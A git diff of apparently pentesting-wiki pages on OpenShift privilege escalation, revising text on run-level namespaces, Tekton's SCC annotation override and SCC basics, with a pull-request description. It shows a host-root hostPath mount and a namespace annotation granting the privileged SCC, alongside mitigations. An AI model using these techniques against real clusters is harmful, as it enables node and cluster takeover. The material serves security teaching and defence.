@@ -89,14 +88,14 @@ spec:
           memory: 100Mi
       volumeMounts:
         - name: hostrootfs
-          mountPath: /mnt
+          mountPath: /mnt/host
   volumes:
     - name: hostrootfs
       hostPath:
-        path:
+        path: /
 ```
 
-Now, it has become easier to escalate privileges to access the host system and subsequently take over the entire cluster, gaining 'cluster-admin' privileges. Look for **Node-Post Exploitation** part in the following page :
+Host access can expose node credentials and other cluster-sensitive material that may enable a broader cluster compromise. See the **Node-Post Exploitation** section in the following page:
 
 {{#ref}}
 ../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -104,9 +103,9 @@ Now, it has become easier to escalate privileges to access the host system and s
 
 ### Custom labels
 
-Furthermore, based on the target setup, some custom labels / annotations may be used in the same way as the previous attack scenario. Even if it is not made for, labels could be used to give permissions, restrict or not a specific resource.
+Depending on the target setup, custom automation or admission policies might also use labels or annotations to grant permissions or change resource restrictions.
 
-Try to look for custom labels if you can read some resources. Here a list of interesting resources :
+Look for custom labels if you can read resources. Interesting resources include:
 
 - Pod
 - Deployment
@@ -119,26 +118,23 @@ $ oc get pod -o yaml | grep labels -A 5
 $ oc get namespace -o yaml | grep labels -A 5
 ```
 
-## List all privileged namespaces
+## List namespaces with the run-level label
 
 ```bash
-$ oc get project -o yaml | grep 'run-level' -b5
+$ oc get namespaces -l 'openshift.io/run-level' --show-labels
 ```
 
-## Advanced exploit
+The fixed default projects listed earlier are also highly privileged even if a label query does not return them.
 
-In OpenShift, as demonstrated earlier, having permission to deploy a pod in a namespace with the `openshift.io/run-level`label can lead to a straightforward takeover of the cluster. From a cluster settings perspective, this functionality **cannot be disabled**, as it is inherent to OpenShift's design.
+## Mitigation
 
-However, mitigation measures like **Open Policy Agent GateKeeper** can prevent users from setting this label.
+Prevent untrusted subjects from creating or modifying namespaces with the reserved label and from deploying workloads into highly privileged projects.<sup>[[1]](#references)</sup>
 
-To bypass GateKeeper's rules and set this label to execute a cluster takeover, **attackers would need to identify alternative methods.**
+Admission-policy tools such as **Open Policy Agent Gatekeeper** can enforce constraints on `Namespace` objects and deny violating admission requests, so they can be configured to reject this label.<sup>[[2]](#references)</sup>
 
 ## References
 
-- [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html)
-- [https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html)
-- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-
-
+- [1] [Managing security context constraints - OpenShift Container Platform 4.22](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/managing-pod-security-policies)
+- [2] [How to use Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/docs/howto/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
@@ -1,24 +1,16 @@
 # OpenShift - Tekton
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 **The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211)
 
-### What is tekton
+### What is Tekton
 
-According to the doc: _Tekton is a powerful and flexible open-source framework for creating CI/CD systems, allowing developers to build, test, and deploy across cloud providers and on-premise systems._ Both Jenkins and Tekton can be used to test, build and deploy applications, however Tekton is Cloud Native.
+Tekton Pipelines is a cloud-native Kubernetes extension for building CI/CD workflows. Like Jenkins, it can support application build, test, and deployment workflows, but represents them through Kubernetes resources typically declared in YAML. A `Task` defines build or delivery steps, a `Pipeline` arranges multiple Tasks, and `TaskRun` and `PipelineRun` objects instantiate them for execution; a PipelineRun creates a TaskRun for each Task, and each TaskRun executes its steps in a pod.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-With Tekton everything is represented by YAML files. Developers can create Custom Resources (CR) of type `Pipelines` and specify multiple `Tasks` in them that they want to run. To run a Pipeline resources of type `PipelineRun` must be created.
+On OpenShift, the Tekton Operator creates a `pipeline` service account (SA) in namespaces where it manages Tekton workloads, attaches the `pipelines-scc` Security Context Constraint (SCC) to it by default, and uses that SA for those workloads unless another SA is selected. Consequently, workload pods can request the permissions allowed by the SCC attached to their SA.<sup>[[4]](#references)</sup>
 
-When tekton is installed a service account (sa) called pipeline is created in every namespace. When a Pipeline is ran, a pod will be spawned using this sa called `pipeline` to run the tasks defined in the YAML file.
+### The `pipeline` service account capabilities
 
-{{#ref}}
-https://tekton.dev/docs/getting-started/pipelines/
-{{#endref}}
-
-### The Pipeline service account capabilities
-
-By default, the pipeline service account can use the `pipelines-scc` capability. This is due to the global default configuration of tekton. Actually, the global config of tekton is also a YAML in an openshift object called `TektonConfig` that can be seen if you have some reader roles in the cluster.
+The cluster-wide `TektonConfig` object controls the default SCC that the operator attaches to the workload service account. The default on OpenShift is `pipelines-scc`.<sup>[[4]](#references)</sup>
 
 ```yaml
 apiVersion: operator.tekton.dev/v1alpha1
@@ -26,19 +18,17 @@ kind: TektonConfig
 metadata:
   name: config
 spec:
-  ...
-  ...
   platforms:
     openshift:
       scc:
         default: "pipelines-scc"
 ```
 
-In any namespace, if you can get the pipeline service account token you will be able to use `pipelines-scc`.
+If you obtain credentials for a namespace's `pipeline` service account, you can submit requests as that identity and target the permissions available to it, including use of its attached SCC.
 
-### The Misconfig
+### The misconfiguration
 
-The problem is that the default scc that the pipeline sa can use is user controllable. This can be done using a label in the namespace definition. For instance, if I can create a namespace with the following yaml definition:
+The operator supports a namespace-specific SCC override through the `operator.tekton.dev/scc` **annotation**. If a user can create or modify a namespace and `maxAllowed` does not impose a sufficiently restrictive ceiling, the user can request a more permissive SCC for Tekton workloads in that namespace.<sup>[[4]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -49,17 +39,11 @@ metadata:
     operator.tekton.dev/scc: privileged
 ```
 
-The tekton operator will give to the pipeline service account in `test-namespace` the ability to use the scc privileged. This will allow the mounting of the node.
+If the configured ceiling permits this request, the operator attaches the `privileged` SCC to the `pipeline` service account in `test-namespace`. OpenShift's `privileged` SCC permits privileged pods and host-directory mounts, so a malicious Tekton workload can mount host paths and use them for node compromise.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### The fix
 
-Tekton documents about how to restrict the override of scc by adding a label in the `TektonConfig` object.
-
-{{#ref}}
-https://tekton.dev/docs/operator/sccconfig/
-{{#endref}}
-
-This label is called `max-allowed`
+Configure both `default` and `maxAllowed` under `spec.platforms.openshift.scc`. The `maxAllowed` field is the highest-priority SCC that namespace annotations may request; to prevent the override above, set it to an SCC no more permissive than your intended ceiling, such as `restricted-v2`.<sup>[[4]](#references)</sup>
 
 ```yaml
 apiVersion: operator.tekton.dev/v1alpha1
@@ -67,15 +51,21 @@ kind: TektonConfig
 metadata:
   name: config
 spec:
-  ...
-  ...
   platforms:
     openshift:
       scc:
         default: "restricted-v2"
-        maxAllowed: "privileged"
+        maxAllowed: "restricted-v2"
 ```
 
+The default alone is not a complete security boundary: Tekton's documentation notes that a workload can select another service account, whose attached SCC may be more permissive. Review who can create or modify namespaces, Tekton Runs, and service accounts, as well as which SCCs those service accounts may use.<sup>[[4]](#references)</sup>
 
+## References
+
+- [1] [Tasks and Pipelines](https://tekton.dev/docs/pipelines/)
+- [2] [Getting Started with Pipelines](https://tekton.dev/docs/getting-started/pipelines/)
+- [3] [TaskRuns](https://tekton.dev/docs/pipelines/taskruns/)
+- [4] [Configuring SCC used for Tekton workloads in OpenShift](https://tekton.dev/docs/operator/sccconfig/)
+- [5] [Managing security context constraints](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/managing-pod-security-policies)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
@@ -1,29 +1,27 @@
 # Openshift - SCC
 
-{{#include ../../banners/hacktricks-training.md}}
-
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Definition
 
-In the context of OpenShift, SCC stands for **Security Context Constraints**. Security Context Constraints are policies that control permissions for pods running on OpenShift clusters. They define the security parameters under which a pod is allowed to run, including what actions it can perform and what resources it can access.
+In OpenShift, SCC stands for **Security Context Constraints**. SCCs are cluster-level policies used during admission to control the permissions available to pods and the conditions under which a pod can run.<sup>[[1]](#references)</sup>
 
-SCCs help administrators enforce security policies across the cluster, ensuring that pods are running with appropriate permissions and adhering to organizational security standards. These constraints can specify various aspects of pod security, such as:
+An SCC can constrain, among other settings:<sup>[[1]](#references)</sup>
 
 1. Linux capabilities: Limiting the capabilities available to containers, such as the ability to perform privileged actions.
 2. SELinux context: Enforcing SELinux contexts for containers, which define how processes interact with resources on the system.
-3. Read-only root filesystem: Preventing containers from modifying files in certain directories.
+3. Read-only root filesystem: Requiring a container's root filesystem to be read-only.
 4. Allowed host directories and volumes: Specifying which host directories and volumes a pod can mount.
 5. Run as UID/GID: Specifying the user and group IDs under which the container process runs.
-6. Network policies: Controlling network access for pods, such as restricting egress traffic.
+6. Host namespaces and networking: Controlling access to host PID, IPC, and network namespaces and host ports.
 
-By configuring SCCs, administrators can ensure that pods are running with the appropriate level of security isolation and access controls, reducing the risk of security vulnerabilities or unauthorized access within the cluster.
+By configuring SCCs, administrators can enforce pod isolation and access-control requirements across a cluster.
 
-Basically, every time a pod deployment is requested, an admission process is executed as the following:
+When a pod is requested, the API server's admission process determines which SCCs the requesting user or service account can use and validates the pod against them. The following diagram illustrates that flow.<sup>[[1]](#references)[[2]](#references)</sup>
 
 <figure><img src="../../images/Managing SCCs in OpenShift-1.png" alt=""><figcaption></figcaption></figure>
 
-This additional security layer by default prohibits the creation of privileged pods, mounting of the host file system, or setting any attributes that could lead to privilege escalation.
+The restricted SCC families deny privileged containers and host-directory mounts; `restricted-v2` also drops all capabilities by default, applies the runtime-default seccomp profile, and requires `allowPrivilegeEscalation` to be unset or `false`.<sup>[[1]](#references)</sup>
 
 {{#ref}}
 ../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
@@ -31,32 +29,34 @@ This additional security layer by default prohibits the creation of privileged p
 
 ## List SCC
 
-To list all the SCC with the Openshift Client :
+Use the OpenShift CLI to list SCCs, inspect their definitions, and check RBAC-based `use` permission:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 $ oc get scc #List all the SCCs
 
-$ oc auth can-i --list | grep securitycontextconstraints #Which scc user can use
+$ oc auth can-i --list | grep securitycontextconstraints #List SCC permission rows
+
+$ oc auth can-i use scc/$SCC #Check RBAC permission to use one SCC
 
 $ oc describe scc $SCC #Check SCC definitions
 ```
 
-All users have access the default SCC "**restricted**" and "**restricted-v2**" which are the strictest SCCs.
+Access to the restricted SCCs depends on the OpenShift version and upgrade history. In current Red Hat documentation, all authenticated users are granted `restricted-v2`; the older `restricted` SCC remains available to authenticated users on clusters upgraded from OpenShift 4.10 or earlier, but new 4.11-and-later installations require an explicit grant. Also note that `oc auth can-i` evaluates RBAC grants only, while `oc describe scc` shows only users and groups assigned directly on the SCC object.<sup>[[1]](#references)</sup>
 
 ## Use SCC
 
-The SCC used for a pod is defined inside an annotation :
+The SCC that admitted a pod is recorded in its `openshift.io/scc` annotation:<sup>[[1]](#references)</sup>
 
 ```bash
-$ oc get pod MYPOD -o yaml | grep scc
+$ oc get pod example-pod -o yaml | grep scc
   openshift.io/scc: privileged
 ```
 
-When a user has access to multiple SCCs, the system will utilize the one that aligns with the security context values. Otherwise, it will trigger a forbidden error.
+When multiple SCCs are available, admission orders them by priority, then restrictiveness, then name, and attempts to validate the pod against them. If none of the available SCCs permits the requested security context, admission rejects the pod with a forbidden error.<sup>[[1]](#references)</sup>
 
 ```bash
-$ oc apply -f evilpod.yaml #Deploy a privileged pod
-  Error from server (Forbidden): error when creating "evilpod.yaml": pods "evilpod" is forbidden: unable to validate against any security context constrain
+$ oc apply -f scc-test-pod.yaml # Deploy a privileged test pod.
+  Error from server (Forbidden): error when creating "scc-test-pod.yaml": pods "scc-test-pod" is forbidden: unable to validate against any security context constraint
 ```
 
 ## SCC Bypass
@@ -67,8 +67,7 @@ openshift-privilege-escalation/openshift-scc-bypass.md
 
 ## References
 
-- [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift)
-
-
+- [1] [Managing security context constraints - OpenShift Container Platform 4.22](https://docs.redhat.com/en/documentation/openshift_container_platform/4.22/html/authentication_and_authorization/managing-pod-security-policies)
+- [2] [Managing SCCs in OpenShift](https://www.redhat.com/en/blog/managing-sccs-in-openshift)
 
 {{#include ../../banners/hacktricks-training.md}}


### PR DESCRIPTION
## Summary
- audit and rewrite citations for the final 41 pages in `src/SUMMARY.md`
- number and deduplicate references, credit primary sources, and place citations at the sourced claims
- remove concrete secrets/callbacks and duplicate content found during the personal review
- keep exactly one References section per page with the training banner after it

## Validation
- full 591-page structural citation/reference audit: 0 failures
- full 591-page duplicate-prose audit: 0 failures
- final batch: exactly 41 changed files
- 228 unique final-batch reference URLs checked successfully (one transient timeout returned 200 on retry)
- `git diff --check`
- `mdbook build` reached preprocessing but local `mdbook-tabs` is not installed